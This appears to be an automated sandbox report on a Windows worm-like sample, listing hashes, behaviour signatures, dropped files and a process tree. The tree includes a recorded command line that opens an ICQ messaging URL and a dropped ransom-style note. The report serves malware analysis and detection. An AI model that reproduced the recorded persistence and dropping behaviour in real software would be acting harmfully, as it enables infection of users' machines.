Analysis

  • max time kernel
    97s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 12:47

General

  • Target

    Virus.Autorun.ATA_virussign.com_dfd2c0f4b4f1366cd3a91a82eb5d649b.exe

  • Size

    26KB

  • MD5

    dfd2c0f4b4f1366cd3a91a82eb5d649b

  • SHA1

    6e109c129ce7415f7c81969f5b3e7fba94b8ad85

  • SHA256

    44744ac47a2c90d6cdd3b592f3e1952edcd2aa5d66d8644f42b81c00e29695d7

  • SHA512

    cad6f3e1519645e0bc665b4ad852ef79ba9a49781da1631eb7626e927dbe5cdf960321e628a3fccc5173299d9c2b6676a989b9e7f1f172810406e1074849c2e2

  • SSDEEP

    768:qq3G3q83wdv7GLGS1R9TNoINEx9jnhwrT:Jkq83wdv7GtN

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 37 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Virus.Autorun.ATA_virussign.com_dfd2c0f4b4f1366cd3a91a82eb5d649b.exe
    "C:\Users\Admin\AppData\Local\Temp\Virus.Autorun.ATA_virussign.com_dfd2c0f4b4f1366cd3a91a82eb5d649b.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Users\Admin\AppData\Local\Temp\Krnl32.exe
      "C:\Users\Admin\AppData\Local\Temp\Krnl32.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Program Files\Internet Explorer\Iexplore.exe
        "C:\Program Files\Internet Explorer\Iexplore.exe" http://wwp.icq.com/scripts/WWPMsg.dll?from=M4TrIx&fromemail=_&subject=MATRIX&body=THE%20MATRIX%20HAS%20COME...&to=90013893%20HTTP/1.0
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4584 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1760
    • C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\HELPME.TXT
      2⤵
      • System Location Discovery: System Language Discovery
      • Opens file in notepad (likely ransom note)
      PID:3220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    04ede744c1294fb087496e0d371511c5

    SHA1

    7f0fe32d23103dbc1c1028ffb626863a795358e6

    SHA256

    0a4b8f0a5fa70ec6f8346ff1d99abc440b7df2ce594de520a4c88fc2a6589de3

    SHA512

    0adf65c1bfd504779004106c4c1c41d3534eb9e5c8ae320adeb3f655b9903b7f9028ae73b6ee3d2471dae7d866bea7db001d9eea519a23b964ba31a5708c75eb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    94cf8a9a8b28f3a395da34e768006df8

    SHA1

    9b7c85100e901b57a3c4fcdbb3559637344d0306

    SHA256

    3dc92fb1a76eceaeabccabec28ad961e4fed822c1889a3a9bf4cf200837c0583

    SHA512

    4dd98ab0e808cdccb630f88ed673bc71d288a3913fc6cbe201558c1cf95ac13b752d754722376c39b8c789dfd7ec1750b0491a784d7d675ce2c1e5709ca729fc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4329235D\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Temp\HELPME.TXT

    Filesize

    67B

    MD5

    057798d389930107a381a2690141ac1d

    SHA1

    e44f1c2475c0f2323507e141dcae53ffef51c624

    SHA256

    5ba8c75f08589b808a6e16225ea565734aeeb23edc40894174d2d135f5e8d3d2

    SHA512

    98b40b6a11027974b482cb645718d34c8ee707ad01d6eba05acbf15a3b8d7c762afc08fef6513623fefe6e297d77a838fbb980d944a4a8e864356dfabac473e2

  • C:\Users\Admin\AppData\Local\Temp\Krnl32.exe

    Filesize

    26KB

    MD5

    735245caf47be17a237dbb61e8dae973

    SHA1

    d9f2e59274e7cd9c9812ebd862ec82d3d0aab842

    SHA256

    5fed85a20e6535e57ec5534c1c2272b78cf66fa885172aaae2c7fe710adc1a72

    SHA512

    8486bd930ae2e7224f813fdeb57da5af6bf855c6377b4fc52f4df184c391445b60c8be1b2634fde9f191ff93da801e57ada681cac6c0433c89933db98fe170bb

  • memory/2288-27-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-28-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-42-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-23-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-48-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-14-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-60-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2288-63-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2572-0-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2572-21-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB